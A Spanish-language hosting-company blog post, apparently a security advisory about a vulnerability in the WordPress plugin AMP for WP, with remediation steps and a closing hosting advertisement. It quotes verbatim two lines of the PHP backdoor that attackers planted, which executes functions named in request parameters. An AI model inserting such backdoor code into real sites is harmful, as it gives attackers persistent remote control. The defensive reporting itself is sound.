Plugin AMP for WP – Seguridad Comprometida en WordPress

Categorias: Wordpress

Plugin AMP for WP - Seguridad Comprometida en WordPress

Todos los usuarios del gestor de contenidos WordPress hacen uso de algún plugin. Los plugins son una constante y una ventaja en WordPress, pero también pueden convertirse en un problema.

En ocasiones la seguridad de un plugin puede verse comprometida y si ha sido hackeado y lo estamos usando, nuestro WordPress puede estar en peligro y se hackeado a través del plugin con el problema de seguridad.

En este caso, el plugin afectado ha sido AMP for WP – Accelerated Mobile Pages, un plugin que crea páginas AMP, un código desarrollado por Google para ”aligerar” los sitios web y que se carguen más rápido al visitarlos con dispositivos móviles.

Debido a que Google indica que, si un sitio no está optimizado para dispositivos móviles se vería perjudicado en el SEO, muchos usuarios de WordPress optaron por usar el plugin AMP for WP para adaptar sus sitios a AMP.

Según WordPress.org, AMP for WP está instalado en más de 100.000 sitios activos, así que el problema del plugin ha podido afectar a muchos usuarios.

Este problema se une al reciente con el plugin WP GDPR Compliance.
 

Cómo Actua la Vulnerabilidad de AMP for WP

Cómo Actua la Vulnerabilidad de AMP for WP

La vulnerabilidad del plugin AMP for WP, solo afecta a los sitios que permiten el registro de usuarios en WordPress.

Es decir, que el usuario tenía que estar registrado para poder aprovecharse de la vulnerabilidad, así que si vuestro WordPress no tiene activada la opción de Cualquiera puede registrarse, en los ajustes generales de WordPress, no habéis estado en peligro.

Por desgracia no suele ser lo habitual y el registro de usuarios en WordPress es algo muy común y que además, está marcada por defecto, así que si no la habéis desactivado, lo más normal es que esté activa.

En el caso de que un usuario registrado como suscriptor o cualquier otro roll, puede llamar a los ganchos AJAX de WordPress e inyectar código malicioso JavaScript en cualquier parte del sitio.

Además, se ha detectado que tras añadir el malware, los atacantes podían secuestrar la sesión del navegador del administrador y registrar un nueva cuenta admin con el nombre de usuario: supportuuser.

Si el atacante consigue acceder como administrador, también añade puertas traseras PHP en algún plugin instalado en WordPress:

@array_diff_ukey(@array((string)@$_REQUEST['vqmode']=>1),
 @array((string)stripslashes(@$_REQUEST['map'])=>2),@$_REQUEST['bootup']);

@extract($_REQUEST);@die($cdate($adate));

De esta manera se asegura que, aunque se elimine la cuenta del administrador falso creada, el atacante puede volver a inyectar código malicioso.

Por supuesto, todo esto ha sido lo detectado por los siempre eficaces chicos de Wordfence, pero no significa que la metodología del ataque no pueda cambiar.

Tenéis más información técnica al respecto en aqui (en inglés).
 

Qué Debo Hacer si tengo Instalado AMP for WP

Qué Debo Hacer si tengo Instalado AMP for WP

Lo primero que debes hacer si tienes instalado el plugin AMP for WP, es actualizarlo.

La versión 0.9.97.20 ya está parcheada y resuelve el problema, la versiones anteriores no y son susceptibles recibir un ataque.

Como hemos comentado antes, es necesario que el atacante esté registrado en WordPress para poder lanzar el ataque, si tenemos usuarios registrados, debemos comprobar si tenemos alguna cuenta de administrador que no sea nuestra en WordPress o buscar si tenemos el usuario supportuuser, en cuyo caso habría que eliminarlo.

Después podemos revisar nuestro alojamiento en busca de algún malware que se haya podido instalar. Esto podemos hacerlo desde la opción Escáner de virus, disponible en cPanel.

En cualquier caso, siempre es recomendable mantener WordPress, plugin y themes instalados (aunque no estén activos) actualizados.

Hosting WordPress SSD Ultraseguro

En Hostinet ofrecemos a nuestros clientes interesados en WordPress los planes de hosting WordPress.

Estos planes están especialmente pensados en el gestor de contenidos WordPress y cuentan con un servicio de soporte técnico especializado en WordPress.

Si bien no podemos evitar que un plugin desarrollado por un tercero se vea comprometido y afecte a tu WordPress, si que podemos revisar tu hosting en buscad de malware instalado.

Si algún atacante a aprovechado alguna vulnerabilidad de algún plugin de WordPress para inyectar código malicioso, lo aislaremos y te pondremos sobre aviso para que puedas reparar el sitio lo antes posible y que el problema te afecte lo menos posible.

Estas son algunas de las opciones más populares de hosting WordPress SSD que podemos ofrecerte en Hostinet:

Hosting WordPress